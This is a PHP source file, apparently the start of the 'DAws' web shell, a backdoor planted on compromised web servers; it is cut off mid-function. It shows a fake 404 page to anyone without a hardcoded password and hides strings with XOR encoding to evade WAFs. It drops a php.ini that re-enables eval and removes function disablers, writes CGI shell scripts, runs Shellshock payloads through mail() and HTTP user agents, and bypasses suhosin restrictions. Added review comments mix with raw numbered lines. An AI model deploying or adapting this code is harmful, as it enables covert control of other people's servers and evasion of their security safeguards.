1<?php
2
3@session_start(); //with error supression because using session_start() multiple times was causing an error on IIS for some reason which makes no sense at all.
4
5//static 404 page
6//-->
7$static_fake_page = "
8<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
9<html><head>
10<title>404 Not Found</title>
11</head><body>
12<h1>Not Found</h1>
13<p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.</p>
14<hr>
15<address>".$_SERVER["SERVER_SOFTWARE"]." Server at ".$_SERVER['SERVER_ADDR']." Port 80</address>
16</body></html>"; //this will be used if DAws fails to show a dynamic fake 404 page
17
18/*
19if (!isset($_SESSION["logged_in"])) {
20 if (isset($_POST["pass"])) {
21 if(md5($_POST["pass"]) == "11b53263cc917f33062363cef21ae6c3") { //DAws
22 $_SESSION["logged_in"] = True;
23 } else {
24 session_destroy();
25 header("HTTP/1.1 404 Not Found");
26 echo $static_fake_page;
27 exit;
28 }
29 } else {
30 session_destroy();
31 header("HTTP/1.1 404 Not Found");
32 echo $static_fake_page;
33 exit();
34 }
35}*/
36//<--
37
38if (ob_get_level()) {
39 ob_end_clean(); //no point of having output buffering on yet
40}
41
42if (!isset($_SESSION['key'])) { //create our session key which will be used for encryption
43 $characters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
44 $characters_length = strlen($characters);
45 $random_string = "";
46 for ($i = 0; $i < 10; $i++) { //length = 10 (length doens't really matter that much though, check our xor functions to understand why)
47 $random_string .= $characters[rand(0, $characters_length - 1)];
48 }
49 $_SESSION['key'] = $random_string;
50}
51
52if (!isset($_SESSION['windows'])) {
53 if (strtoupper(substr(PHP_OS, 0, 3)) == 'WIN') { //checking if we're running on a Window's machine
54 $_SESSION["windows"] = True;
55 $_SESSION["windows_drive"] = realpath("\\"); //saving the values instead of using realpath multiple times later on
56 } else {
57 $_SESSION["windows"] = False;
58 }
59}
60
61//base64 recoded to bypass disablers
62$base64ids = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "+", "/");
63
//Converts a string of binary digits (e.g. "101") to an integer.
//Walks the string from its last character to its first, weighting the i-th
//character from the right by 2^i. Each character goes through intval(), so
//input is never rejected: a '2' contributes 2 * 2^i, a letter contributes 0.
//NOTE(review): the `$string{...}` curly-brace string offset syntax was removed
//in PHP 8.0, so this file only parses on PHP 7.x and earlier.
function bin_dec($string) {
    $decimal = ""; //starts as a string; the += below coerces it to a number
    for($i = 0; $i<strlen($string); $i++) {
        $dec = intval($string{(strlen($string))-$i-1})*pow(2, $i);
        $decimal+=$dec;
    }

    return intval($decimal);
}
73
//Converts a non-negative integer to its binary representation as a string
//with no leading zeros ("0" for zero, "101" for 5). The loop peels off the
//lowest bit with %2 and halves with intval($current/2) until 1 remains.
//NOTE(review): there is no exit path for negative input - $current never
//equals 1 and, once intval() rounds it to 0, the while(1) loop never ends.
function dec_bin($dec) {
    $binary = "";
    $current = intval($dec);

    if ($current == 0) {
        return "0";
    }

    while (1) {
        if ($current == 1) { //the most significant bit, nothing left to halve
            $binary="1".$binary;
            break;
        }
        $binary = ($current%2).$binary; //prepend the current lowest bit
        $current = intval($current/2);
    }

    return $binary;
}
93
//Hand-rolled base64 encoder using the standard alphabet held in $base64ids.
//Steps: each byte becomes an 8-digit binary string (dec_bin() + zero padding)
//and the strings are concatenated; the bit string is cut into 6-bit groups,
//the last group is right-padded with zeros, every group is looked up in
//$base64ids, and the result is '='-padded to a multiple of 4 characters.
//For non-empty input this appears to produce the same text as base64_encode().
//NOTE(review): empty input is not special-cased - with no groups the padding
//step reads $array[-1] (undefined), so "" does not encode to "".
//NOTE(review): the foreach by reference is not followed by unset($value);
//harmless here only because $value is local and not used afterwards.
function base64encoding($string) {
    global $base64ids;

    $binary = "";
    for ($i = 0; $i<strlen($string); $i++) {
        $charASCII = ord($string{$i});
        $asciiBIN = dec_bin($charASCII);
        if (strlen($asciiBIN) != 8) { //dec_bin() drops leading zeros; restore them
            $asciiBIN = str_repeat("0", 8-strlen($asciiBIN)).$asciiBIN;
        }
        $binary.= $asciiBIN;
    }

    $array = array();
    for ($j = 0; $j<strlen($binary); $j = $j + 6) { //6 bits per base64 character
        $part = substr($binary, $j, 6);
        array_push($array, $part);
    }

    if (strlen($array[count($array)-1]) != 6) { //zero-fill the last partial group
        $array[count($array)-1] = $array[count($array)-1].str_repeat("0", 6 - strlen($array[count($array)-1]));
    }

    $base64 = "";
    foreach ($array as &$value) {
        $value = bin_dec($value);
        $value = $base64ids[$value];
        $base64.=$value;
    }

    if ((strlen($base64) % 4) != 0) { //'=' padding to a multiple of 4
        $base64.=str_repeat("=", 4-(strlen($base64) % 4));
    }

    return $base64;
}
130
//Hand-rolled base64 decoder, the inverse of base64encoding(). The '=' padding
//is stripped first; each character is mapped back to its index in $base64ids,
//written as 6 binary digits, and the concatenated bits are regrouped into
//bytes. Trailing bits that do not form a whole byte (the zero padding added
//by the encoder) are discarded before the chr() step.
//NOTE(review): array_search() is non-strict and returns false for a character
//outside the table; dec_bin(false) yields "0", so such characters silently
//decode as six zero bits instead of being reported as invalid input.
//NOTE(review): the foreach by reference is not followed by unset($value).
function base64decoding($string) {
    global $base64ids;

    $string = str_replace("=", "", $string);

    $binary = "";
    for ($i = 0; $i < strlen($string); $i++) {
        $charID = array_search($string{$i}, $base64ids);
        $idBIN = dec_bin($charID);
        if (strlen($idBIN) != 6) { //dec_bin() drops leading zeros; restore them
            $idBIN = str_repeat("0", 6-strlen($idBIN)).$idBIN;
        }
        $binary.= $idBIN;
    }

    if (strlen($binary) %8 != 0) { //drop the encoder's zero-fill bits
        $binary = substr($binary, 0, strlen($binary)-(strlen($binary) %8));
    }

    $array = array();
    for ($j = 0; $j<strlen($binary); $j = $j + 8) { //8 bits per output byte
        $part = substr($binary, $j, 8);
        array_push($array, $part);
    }

    $text = "";
    foreach ($array as &$value) {
        $value = bin_dec($value);
        $value = chr($value);
        $text.=$value;
    }

    return $text;
}
165
166function xor_this($string, $key=null) { //our 'random key' based xor encryption
167 if ($string == "") {
168 return $string;
169 }
170
171 if ($key == null) {
172 $key = $_SESSION['key'];
173 }
174
175 $outText = '';
176
177 for($i=0; $i<strlen($string);) {
178 for($j=0; ($j<strlen($key) && $i<strlen($string)); $j++,$i++) {
179 $outText .= $string{$i} ^ $key{$j};
180 }
181 }
182
183 return base64encoding($outText);
184} //so basically every string character gets xored once by one key character. That key character is chosen by order
185//example: string=dotcppfile key=1234
186//d will get xored by 1
187//o will get xored by 2
188//etc
189//the first p will get xored by 1 as well because we start all over when all the characters of our key gets used.
190//this gets the job done at its best when it comes to bypassing security systems like WAFs, etc...
191
192function unxor_this($string, $key=null) {
193 if ($string == "") {
194 return $string;
195 }
196
197 if ($key == null) {
198 $key = $_SESSION['key'];
199 }
200
201 return base64decoding(xor_this(base64decoding($string), $key));
202}
203
204//recursive glob used later on to find DAws's directory (first method)
205function recursive_glob($path) {
206 $paths = glob($path."/*", GLOB_ONLYDIR);
207 foreach ($paths as $path) {
208 if ((is_readable($path)) && (is_writable($path))) {
209 return $path;
210 } else if ((installed_php("fileowner")) && (installed_php("posix_getpwuid"))) {
211 //we can chmod a direcotry that we own and gift it to our beloved DAws!
212 $fileowner = posix_getpwuid(fileowner($path));
213 $fileowner = $fileowner["name"];
214 if($_SESSION["process_owner"] == $fileowner) { //we own that folder
215 if (chmod($path, 0777)) { //successfully chmoded
216 return $path;
217 }
218 }
219 }
220 }
221
222 foreach ($paths as $path) {
223 $path = recursive_glob($path);
224 if ($path != "") {
225 return $path;
226 }
227 }
228}
229
230//recursive iterator used later on to find DAws's directory (second method)
231function recursive_iterator($location) {
232 $iter = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(realpath($location)), RecursiveIteratorIterator::SELF_FIRST, RecursiveIteratorIterator::CATCH_GET_CHILD);
233
234 $paths = array(realpath($location));
235 foreach ($iter as $path => $dir) {
236 if ($dir->isDir()) {
237 if ((is_readable($dir)) && (is_writable($dir))) {
238 return realpath($path);
239 } else if ((installed_php("fileowner")) && (installed_php("posix_getpwuid"))) {
240 //we can chmod a direcotry that we own and gift it to our beloved DAws!
241 $fileowner = posix_getpwuid(fileowner($dir));
242 $fileowner = $fileowner["name"];
243 if($_SESSION["process_owner"] == $fileowner) { //we own that folder
244 if (chmod($dir, 0777)) { //successfully chmoded
245 return realpath($path);
246 }
247 }
248 }
249 }
250 }
251}
252
//Reads a php.ini directive, trying ini_get() first and get_cfg_var() second.
//ini_get() returns false for an unknown directive, and the loose == "" test
//treats both false and "" as "not set", which is what triggers the fallback.
//Both calls are @-suppressed, so a failure of either is not reported.
function get_php_ini($string) { //read from php.ini
    $output = @ini_get($string);
    if ($output == "") {
        $output = @get_cfg_var($string);
    }

    return $output;
}
261
262//check what's disabled by disable_functions and suhosin
263$disabled_php = array();
264$disabled_suhosin = array();
265
266foreach (explode("," , get_php_ini(unxor_this("AAYHAhIcAzYKEAoMAAofHhU=", "dotcppfile"))) as $disabled) { //disable_functions
267 array_push($disabled_php, $disabled);
268}
269foreach (explode(",", get_php_ini(unxor_this("AAYHAhIcAzYPCQUcBwYD", "dotcppfile"))) as $disabled) { //disabled_classes
270 array_push($disabled_php, $disabled);
271}
272foreach (explode("," , get_php_ini(unxor_this("FxocDAMZCEcJHQEMARcfAkgPGQsHQRYPERMNBQUWEA==", "dotcppfile"))) as $disabled) { //suhosin.executor.func.blacklist
273 array_push($disabled_suhosin, $disabled);
274}
275
276$disabled_php = array_filter($disabled_php);
277$disabled_suhosin = array_filter($disabled_suhosin);
278
279$disabled_php = array_map('trim', $disabled_php);
280$disabled_suhosin = array_map('trim', $disabled_suhosin);
281
//Returns True when $function_name is listed in the global $disabled_php array
//(filled above from the disable_functions and disabled_classes directives,
//already trimmed). Entries are compared with loose ==; the walk stops at the
//first match. Reads $GLOBALS directly rather than taking the list as an argument.
function disabled_php($function_name) { //checks if a function is disabled by php
    foreach ($GLOBALS["disabled_php"] as $value) {
        if ($function_name == $value) {
            return True;
        }
    }

    return False;
}
291
//Returns True when $function_name is listed in the global $disabled_suhosin
//array (filled above from suhosin.executor.func.blacklist, already trimmed).
//Same loose == linear scan as disabled_php(); only the list consulted differs.
function disabled_suhosin($function_name) { //checks if a function is disabled by suhosin
    foreach ($GLOBALS["disabled_suhosin"] as $value) {
        if ($function_name == $value) {
            return True;
        }
    }

    return False;
}
301
302function installed_php($function=null, $class=null) { //checks if a function/class exists
303 if ($function != null) {
304 if (disabled_php("function_exists") == False) {
305 if (disabled_suhosin("function_exists") == False) {
306 if (function_exists($function)) {
307 return True;
308 } else {
309 return False;
310 }
311 } else {
312 if (bypass_suhosin("function_exists", $function)) {
313 return True;
314 } else {
315 return False;
316 }
317 }
318 } else {
319 ob_start();
320 $test = $function();
321 $return_value = ob_get_contents();
322 ob_end_clean();
323
324 if ((strpos($return_value, "error") == False) && (strpos($return_value, "Warning") == False)) {
325 return True;
326 } else {
327 return False;
328 }
329 }
330 } else {
331 if (disabled_php("class_exists") == False) {
332 if (disabled_suhosin("class_exists") == False) {
333 if (class_exists($class)) {
334 return True;
335 } else {
336 return False;
337 }
338 } else
339 if (bypass_suhosin("class_exists", $class)) {
340 return True;
341 } else {
342 return False;
343 }
344 } else {
345 ob_start();
346 $test = new $class();
347 $return_value = ob_get_contents();
348 ob_end_clean();
349
350 if ((strpos($return_value, "error") == False) && (strpos($return_value, "Warning") == False)) {
351 return True;
352 } else {
353 return False;
354 }
355 }
356 }
357}
358
359//dynamic 404 page -->
//Now the reason I don't like this much is because there's a lot of important code that needs to be run first
361//to make sure that we can show a dynamic fake 404 page while bypassing security systems
362if (!isset($_SESSION["logged_in"])) {
363 $show_it = False;
364
365 if (isset($_POST["pass"])) {
366 if(md5($_POST["pass"]) == "11b53263cc917f33062363cef21ae6c3") { //DAws
367 $_SESSION["logged_in"] = True;
368 } else {
369 session_destroy();
370 @header("HTTP/1.1 404 Not Found");
371 $show_it = True;
372 }
373 } else {
374 session_destroy();
375 @header("HTTP/1.1 404 Not Found");
376 $show_it = True;
377 }
378
379 if ($show_it == True) {
380 $random_url = "";
381 if (isset($_SERVER['HTTPS'])) {
382 $random_url .= "https";
383 } else {
384 $random_url .= "http";
385 }
386
387 $random_string = time();
388 $random_url .= "://".$_SERVER['SERVER_NAME']."/".$random_string."/DAws.php"; //our random bitch
389 $output = @url_get_contents($random_url);
390
391 if ($output != "") {
392 echo str_replace("/".$random_string."/DAws.php", "/DAws.php", $output);
393 } else {
394 echo $static_fake_page;
395 }
396
397 exit();
398 }
399}//<--
400
401//finds current process's owner
402if (!isset($_SESSION["process_owner"])) {
403 if (installed_php("posix_geteuid")) { //Linux
404 $_SESSION["process_owner"] = posix_getpwuid(posix_geteuid());
405 $_SESSION["process_owner"] = $_SESSION["process_owner"]["name"];
406 } else { //Linux and Windows
407 $_SESSION["process_owner"] = getenv('USERNAME');
408 }
409}
410
411//finds DAws's directory; a writeable and readable directory, move to it and drop our php.ini and .htaccess files that will
412//make life easier if suphp is installed
413if (!isset($_SESSION["daws_directory"])) {
414 $daws_dir = getcwd();
415
416 if ($_SESSION["windows"] == True) {
417 $_SESSION["slash"] = "\\"; //we can use this later on
418 } else {
419 $_SESSION["slash"] = "/";
420 }
421
422 //finding the web dir which will be used here and when deploying the CGI Scripts
423 //not using DOCUMENT_ROOT anymore because it may need to be hardcoded and reset, and fuck all of that
424 $array = explode($_SESSION["slash"], getcwd());
425 for ($i = 0; $i<(count(explode("/", $_SERVER["SCRIPT_NAME"]))-2); $i++) {
426 array_pop($array);
427 }
428
429 $_SESSION["web_dir"] = implode($_SESSION["slash"], $array);
430
431 //finding DAws's directory
432 if ((is_writable($daws_dir)) && (is_readable($daws_dir))) {
433 $_SESSION["daws_directory"] = $daws_dir; //no need to look further since we are in it
434 } else { //lets dance
435 $locations = array($_SESSION["web_dir"], realpath($_SESSION["slash"])); //we go for a random directory if a proper web directory wasn't found
436
437 foreach ($locations as $location) {
438 //uses the recursive glob function for old php versions
439 if (disabled_php("glob") == False) {
440 $_SESSION["daws_directory"] = recursive_glob(realpath($location));
441 } else if ((version_compare(PHP_VERSION, '5.0.0') >= 0) && (installed_php(null, "RecursiveIteratorIterator") == True)) { //Iterator incoming!
442 $_SESSION["daws_directory"] = recursive_iterator($location);
443 }
444
445 if ((isset($_SESSION["daws_directory"])) && ($_SESSION["daws_directory"] != "")) {
446 break;
447 }
448 }
449 }
450
451 if (basename($_SESSION["daws_directory"]) != "DAws") { //We just landed, time to get ready for battle because we got some mofos to kill!
452 $_SESSION["daws_directory"] .= "/DAws";
453 @mkdir($_SESSION["daws_directory"]); //incase it already existed. We'll simply replace the old files of DAws with the new ones.
454
455 if (strpos($_SESSION["daws_directory"], $_SESSION["web_dir"]) !== False) {
456 //we clear all disablers, allow eval and url opening
457 $php_ini = "AAYHAhIcAzYKEAoMAAofHhVJUW8ABgcCEhwDNg8JBRwHBgNQW2MfEAwABwoeXgMRCQYRGxsRXhYTBw9LBgMVABscDxoYRVlPVkF6AxMBAxYNAVoGCBUFHBgKFkEQCgMRBAUJOgEZFQ9QTUYmCgNuDhgPHwc5HB4JOwkbExUeRlRMKgo=";
458 //and here we link that php.ini to suphp as a config file
459 //http://support.hostgator.com/articles/specialized-help/technical/how-to-get-your-php-ini-path-with-suphp
460 $htaccess ="<IfModule mod_suphp.c>\nsuPHP_ConfigPath ".$_SESSION["daws_directory"].$_SESSION["slash"]."php.ini\n</IfModule>";
461
462 write_to_file($_SESSION["daws_directory"]."/php.ini", unxor_this($php_ini, "dotcppfile"));
463 write_to_file($_SESSION["daws_directory"]."/.htaccess", $htaccess);
464
465 //and now we move our DAws to its directory if it's not there already
466 if (getcwd() != $_SESSION["daws_directory"]) {
467 copy($_SERVER["SCRIPT_FILENAME"], $_SESSION["daws_directory"]."/DAws.php");
468 header("Location: http://".$_SERVER['SERVER_NAME'].str_replace($_SESSION["web_dir"], "", $_SESSION["daws_directory"]."/DAws.php"));
469 }
470 }
471 }
472}
473
474function write_to_file($location, $string) {
475 $output = file_put_contents_extended($location, $string); //file_put_contents
476 if ($output != False) {
477 return;
478 }
479
480 $fp = fopen_extended($location, "w"); //fopen
481 if ($fp != False) {
482 fwrite($fp, $string);
483 fclose($fp);
484 return;
485 }
486
487 execute_command("echo ".escapeshellarg($string)." > $location"); //system commands
488}
489
490function read_file($location) {
491 if (filesize($location) == 0) { //empty files will cause file_get_contents to return false and fread to cause an error
492 return "";
493 }
494
495 $content = file_get_contents_extended($location); //file_get_contents
496 if ($content == False) {
497 return htmlspecialchars($content);
498 }
499
500 $fp = fopen_extended($location, "r"); //fopen
501 if ($fp != False) {
502 $content = htmlspecialchars(fread($fp, filesize($location)));
503 fclose($fp);
504 return $content;
505 }
506
507 if ($_SESSION["windows"] == True) { //system commands
508 return htmlspecialchars(execute_command("type $location"));
509 } else {
510 return htmlspecialchars(execute_command("cat $location"));
511 }
512
513 return "DAws: failed to read the file because file_get_contents_extended, fopen_extended and system commands failed."; //fail
514}
515
516function url_get_contents($url, $user_agent=null) { //used to download the source of a webpage
517 if ((installed_php("curl_version") == True) && (disabled_php("curl_init") == False)) { //using curl
518 if (disabled_suhosin("curl_init") == False) {
519 $ch = curl_init(str_replace(" ","%20",$url));
520 } else {
521 $ch = bypass_suhosin("curl_init", str_replace(" ","%20",$url));
522 }
523
524 curl_setopt($ch, CURLOPT_URL, $url);
525 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
526
527 if ($user_agent != null) { //used by shellshock (method 2)
528 curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
529 }
530
531 $content = curl_exec($ch);
532 curl_close($ch);
533
534 return $content;
535 }
536
537 //for file_get_contents and fopen
538 if ($user_agent != null) {
539 $opts = array('http'=>array('header'=>"User-Agent: $user_agent\r\n"));
540 $context = stream_context_create($opts);
541 } else {
542 $context = null;
543 }
544
545 //using file_get_contents
546 $content = file_get_contents_extended($url, True, $context);
547 if ($content != False) {
548 return $content;
549 }
550
551 //using fopen
552 $fp = fopen_extended($url, "r", True, $context);
553 if ($fp != False) {
554 $content = fread($fp, filesize($url));
555 fclose($fp);
556 return $content;
557 }
558
559 //using system commands (no need to apply shellshock here since we're already using system commands...)
560 if ($_SESSION["windows"] == True) {
561 if (execute_command("bitsadmin", True) == True) { //bitsadmin is a nice choice here
562 return execute_command("bitsadmin.exe /Transfer DAwsDownloadJob $link $location > null; type $location");
563 } else if (strpos(execute_command("powershell.exe"), "Windows PowerShell")) { //powershell comes next
564 return execute_command("powershell.exe Invoke-WebRequest $link -OutFile $location > null; type $location");
565 } else {
566 return False; //sadly, nothing worked
567 }
568 } else { //curl or wget for Linux
569 if (execute_command("curl", True) == True) {
570 return execute_command("curl $url");
571 } else if (execute_command("wget", True) == True) {
572 return execute_command("wget -qO- $url");
573 } else {
574 return False;
575 }
576 }
577}
578
579if (!isset($_SESSION["cgi"])) { //setting up the cgi scripts
580 $cgi_htaccess = "bi4QBzgRCA0AABZPFwQZXRUKHgwUG1RNAxhGRw4EEGU7EwQZCQcfRU8qDAYTMyEgZg==";
581 $cgi_bash = "R05bARkeSQsNFgxlfgYTGAlJTiYLAQAGHgRLHRUVAVVUFxUIEkYEEQkDVmkVEw4GTEdGZX4AHx0LCAIBWQ8RABgfRktINDEqJjovIzI7JSsjTVQfUAMDDUxICk9TEF8uSEMPCgkCFQ0UTTpBNztCMl4/WV5MTUM5VUAERFAMRgsNFgFZQENdXQIMDwoAClQfUAMDDUxHF0BRUUBfRkYLR0QTVBAVFEZLH0pPQFRMF1IGYwkTBQNURxMfCwQNCwA=";
582 $cgi_bat = "JAoXCx9QCQ8Kb24KFwsfUCUGAhEBAQBOBAkWDFZFEAoMF18YEgQAbwEMHAxeemwACkUBFx0QBFACDA8KAApaFwgERg0JCUQLEQAfFANHGB0QZVwGExgJSUk0MSomOi8jMjslKyNVCltVWUZXTAAKDBsHFRRIHRQRbgwREQQFEgAARUkLEQAfFANJTgAKDBsHFRRIHRQRRk9WBxUTCQ0JSxAXAEF6AwMdQxVEDBkHTUwCDA8KAApaFwgEbEwPCABK";
583 $cgi_path = $_SESSION["daws_directory"]."/cgi";
584
585 if (isset($_SERVER['HTTPS'])) {
586 $protocol = "https";
587 } else {
588 $protocol = "http";
589 }
590
591 if (!file_exists($cgi_path)) {
592 mkdir($cgi_path);
593 }
594
595 //writing everything
596 write_to_file($cgi_path."/.htaccess", unxor_this($cgi_htaccess, "dotcppfile"));
597
598 if ($_SESSION["windows"] == True) {
599 write_to_file($cgi_path."/DAws.bat", unxor_this($cgi_bat, "dotcppfile"));
600 chmod($cgi_path."/DAws.bat", 0755);
601 $_SESSION["cgi_url"] = $protocol."://".$_SERVER['SERVER_NAME'].str_replace("\\", "/", str_replace(realpath($_SESSION["web_dir"]), "", $cgi_path))."/DAws.bat";
602 } else {
603 write_to_file($cgi_path."/DAws.sh", unxor_this($cgi_bash, "dotcppfile"));
604 chmod($cgi_path."/DAws.sh", 0755);
605 $_SESSION["cgi_url"] = $protocol."://".$_SERVER['SERVER_NAME'].str_replace($_SESSION["web_dir"], "", $cgi_path)."/DAws.sh";
606 }
607
608 //testing it
609 $test = url_get_contents($_SESSION["cgi_url"]."?command=".base64encoding("echo dotcppfile"));
610 if(($test != "") && (strpos($test, "Internal Server Error") === False) && (strpos($test, "QUERY_STRING") === False)) {
611 $_SESSION["cgi"] = True;
612 } else {
613 $_SESSION["cgi"] = False;
614 }
615}
616
617function execute_ssh($command) { //ssh
618 include_php($_SESSION["daws_directory"]."/SSH2.php"); //this should have been uploaded by the user himself
619
620 $ssh = new Net_SSH2('127.0.0.1', $_SESSION["ssh_port"]);
621
622 if ($ssh->login($_SESSION["ssh_user"], unserialize($_SESSION["ssh_rsa"]))) {
623 return $ssh->exec($command);
624 }
625}
626
627function shsh($command) { //shellshock (method 1)
628 $filename = $_SESSION["daws_directory"].time().".data";
629 putenv("PHP_LOL=() { x; }; $command > $filename 2>&1");
630 mail("a@127.0.0.1", "", "", "", "-bv");
631 if (file_exists($filename)) {
632 $content = read_file($filename);
633 unlink($filename);
634 } else {
635 $content = "";
636 }
637
638 return $content;
639} //this was written by Starfall and I know that this will simply fail if sendmail wasn't installed
640
641function shsh2($command) { //shellshock (method 2)
642 $filename = $_SESSION["daws_directory"].time().".data";
643 url_get_contents($_SESSION["shsh2_cgi_script"], "() { x; }; $command > $filename 2>&1"); //this will be updated later but lets keep it here for now
644
645 if (file_exists($filename)) {
646 $content = read_file($filename);
647 unlink($filename);
648 } else {
649 $content = "";
650 }
651
652 return $content;
653} //this will send http requests with a shellshock user agent to a cgi script
654
655if (!isset($_SESSION["shsh"])) { //testing shellshock1
656 if ($_SESSION["windows"] == False) { //more checks aren't necessary thanks to the upcoming test
657 if (shsh("echo Dyme and Starfall") == "Dyme and Starfall") {
658 $_SESSION["shsh"] = True;
659 } else {
660 $_SESSION["shsh"] = False;
661 }
662 } else {
663 $_SESSION["shsh"] = False;
664 }
665}
666
667if (!isset($_SESSION["shsh2"])) { //testing shellshock2
668 if ($_SESSION["windows"] == False) {
669 if (shsh("echo Dyme and Starfall") == "Dyme and Starfall") {
670 $_SESSION["shsh2"] = True;
671 } else {
672 $_SESSION["shsh2"] = False;
673 }
674 } else {
675 $_SESSION["shsh2"] = False;
676 }
677}
678
679//finds the location of ruby/perl/python for Windows
680if (!isset($_SESSION["pathes_found"])) {
681 if ($_SESSION["windows"] == True) { //windows...
682 if (execute_command($_SESSION["windows_drive"]."Python27:python", True)) {
683 $_SESSION["python"] = $_SESSION["windows_drive"]."Python27\\python.exe";
684 }
685
686 if (execute_command($_SESSION["windows_drive"]."Python34:python", True)) {
687 $_SESSION["python"] = $_SESSION["windows_drive"]."Python34\\python.exe";
688 }
689
690 if (execute_command($_SESSION["windows_drive"]."Perl32\\bin:perl", True)) {
691 $_SESSION["perl"] = $_SESSION["windows_drive"]."Perl32\\bin\\perl.exe";
692 }
693
694 if (execute_command($_SESSION["windows_drive"]."Perl64\\bin:perl", True)) {
695 $_SESSION["perl"] = $_SESSION["windows_drive"]."Perl64\\bin\\perl.exe";
696 }
697
698 if (execute_command($_SESSION["windows_drive"]."Ruby21-x32\\bin:ruby", True)) {
699 $_SESSION["ruby"] = $_SESSION["windows_drive"]."Ruby21-x32\\bin\\ruby.exe";
700 }
701
702 if (execute_command($_SESSION["windows_drive"]."Ruby21-x64\\bin:ruby", True)) {
703 $_SESSION["ruby"] = $_SESSION["windows_drive"]."Ruby21-x64\\bin\\ruby.exe";
704 }
705 } else { //DAMN YOU BILL! Lol, this is much easier
706 $softwares = array("perl", "python", "ruby", "php");
707
708 foreach ($softwares as $software) {
709 if (execute_command($software, True)) {
710 $_SESSION[$software] = $software;
711 }
712 }
713 }
714
715 $_SESSION["pathes_found"] = True;
716}
717
718function bypass_suhosin($function, $arg1=null, $arg2=null, $arg3=null, $arg4=null, $arg5=null, $output_needed = True) { //I found no other way to deal with arguments... poor me.
719 if ($arg5 != null) {
720 if (disabled_php("call_user_func") == False) {
721 $return_value = call_user_func($function, $arg1, $arg2, $arg3, $arg4, $arg5);
722 } else if (disabled_php("call_user_func_array") == False) {
723 $return_value = call_user_func_array($function, array($arg1, $arg2, $arg3, $arg4, $arg5));
724 } else if ((version_compare(PHP_VERSION, '5.0.0') >= 0) && (disabled_php(null, "ReflectionFunction") == False)) {
725 $ref_function = new ReflectionFunction($function);
726 $handle = $ref_function->invoke($arg1, $arg2, $arg3, $arg4, $arg5);
727 if (is_string($handle)) {
728 $return_value = $handle;
729 } else {
730 $return_value = fread($handle, 4096);
731 pclose($handle);
732 }
733 } else if ($output_needed == False) {
734 if ((version_compare(PHP_VERSION, '5.1.0') >= 0) && (disabled_php(null, "ArrayIterator") == False)) {
735 $it = new ArrayIterator(array(""));
736 iterator_apply($it, $function, array($arg1, $arg2, $arg3, $arg4, $arg5));
737 } else if (disabled_php("register_tick_function") == False) {
738 declare(ticks=1);
739 register_tick_function($function, $arg1, $arg2, $arg3, $arg4, $arg5);
740 unregister_tick_function($function);
741 } else if (disabled_php("array_map") == False) {
742 array_map($function, array($arg1, $arg2, $arg3, $arg4, $arg5));
743 } else if (disabled_php("array_walk") == False) {
744 $x = array($arg1, $arg2, $arg3, $arg4, $arg5);
745 array_walk($x, $function);
746 } else if (disabled_php("array_filter") == False) {
747 array_filter(array($arg1, $arg2, $arg3, $arg4, $arg5), $function);
748 } else if (disabled_php("register_shutdown_function")) {
749 register_shutdown_function($function, $arg1, $arg2, $arg3, $arg4, $arg5);
750 }
751 }
752 } else if ($arg4 != null) {
753 if (disabled_php("call_user_func") == False) {
754 $return_value = call_user_func($function, $arg1, $arg2, $arg3, $arg4);
755 } else if (disabled_php("call_user_func_array") == False) {
756 $return_value = call_user_func_array($function, array($arg1, $arg2, $arg3, $arg4));
757 } else if ((version_compare(PHP_VERSION, '5.0.0') >= 0) && (disabled_php(null, "ReflectionFunction") == False)) {
758 $ref_function = new ReflectionFunction($function);
759 $handle = $ref_function->invoke($arg1, $arg2, $arg3, $arg4);
760 if (is_string($handle)) {
761 $return_value = $handle;
762 } else {
763 $return_value = fread($handle, 4096);
764 pclose($handle);
765 }
766 } else if ($output_needed == False) {
767 if ((version_compare(PHP_VERSION, '5.1.0') >= 0) && (disabled_php(null, "ArrayIterator") == False)) {
768 $it = new ArrayIterator(array(""));
769 iterator_apply($it, $function, array($arg1, $arg2, $arg3, $arg4));
770 } else if (disabled_php("register_tick_function") == False) {
771 declare(ticks=1);
772 register_tick_function($function, $arg1, $arg2, $arg3, $arg4);
773 unregister_tick_function($function);
774 } else if (disabled_php("array_map") == False) {
775 array_map($function, array($arg1, $arg2, $arg3, $arg4));
776 } else if (disabled_php("array_walk") == False) {
777 $x = array($arg1, $arg2, $arg3, $arg4);
778 array_walk($x, $function);
779 } else if (disabled_php("array_filter") == False) {
780 array_filter(array($arg1, $arg2, $arg3, $arg4), $function);
781 } else if (disabled_php("register_shutdown_function")) {
782 register_shutdown_function($function, $arg1, $arg2, $arg3, $arg4);
783 }
784 }
785 } else if ($arg3 != null) {
786 if (disabled_php("call_user_func") == False) {
787 $return_value = call_user_func($function, $arg1, $arg2, $arg3);
788 } else if (disabled_php("call_user_func_array") == False) {
789 $return_value = call_user_func_array($function, array($arg1, $arg2, $arg3));
790 } else if ((version_compare(PHP_VERSION, '5.0.0') >= 0) && (disabled_php(null, "ReflectionFunction") == False)) {
791 $ref_function = new ReflectionFunction($function);
792 $handle = $ref_function->invoke($arg1, $arg2, $arg3);
793 if (is_string($handle)) {
794 $return_value = $handle;
795 } else {
796 $return_value = fread($handle, 4096);
797 pclose($handle);
798 }
799 } else if ($output_needed == False) {
800 if ((version_compare(PHP_VERSION, '5.1.0') >= 0) && (disabled_php(null, "ArrayIterator") == False)) {
801 $it = new ArrayIterator(array(""));
802 iterator_apply($it, $function, array($arg1, $arg2, $arg3));
803 } else if (disabled_php("register_tick_function") == False) {
804 declare(ticks=1);
805 register_tick_function($function, $arg1, $arg2, $arg3);
806 unregister_tick_function($function);
807 } else if (disabled_php("array_map") == False) {
808 array_map($function, array($arg1, $arg2, $arg3));
809 } else if (disabled_php("array_walk") == False) {
810 $x = array($arg1, $arg2, $arg3);
811 array_walk($x, $function);
812 } else if (disabled_php("array_filter") == False) {
813 array_filter(array($arg1, $arg2, $arg3), $function);
814 } else if (disabled_php("register_shutdown_function")) {
